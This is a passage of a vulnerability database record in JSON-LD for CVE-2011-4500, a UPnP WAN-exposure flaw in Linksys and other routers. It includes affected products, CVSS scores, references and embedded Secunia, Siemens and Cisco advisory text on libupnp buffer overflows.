VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
The Portable SDK for UPnP Devices (libupnp) library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0179",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linksys wrt54gx router",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "2.00.05"
},
{
"model": "wrt54gx",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "2.0"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "linksys wrt54gx router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "wrt54gx",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "firmware 2.00.05"
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:linksys_wrt54gx_router_firmware:2.00.05:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54gx:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4500"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4500",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4500",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52445",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4500",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-362",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52445",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation on the Cisco Linksys WRT54GX with firmware 2.00.05, when UPnP is enabled, configures the SOAP server to listen on the WAN port, which allows remote attackers to administer the firewall via SOAP requests. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. 
\nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. 
\n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. 
This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4500",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5055",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52445",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"id": "VAR-201111-0179",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5055"
}
]
},
"last_update_date": "2023-12-18T12:09:30.385000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.cisco.com/"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5055)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6024"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4500"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4500"
},
{
"trust": 0.6,
"url": "http://www.kb.cert.org/vuls/id/357851http"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"db": "VULHUB",
"id": "VHN-52445"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003030"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4500"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-362"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5055"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52445"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
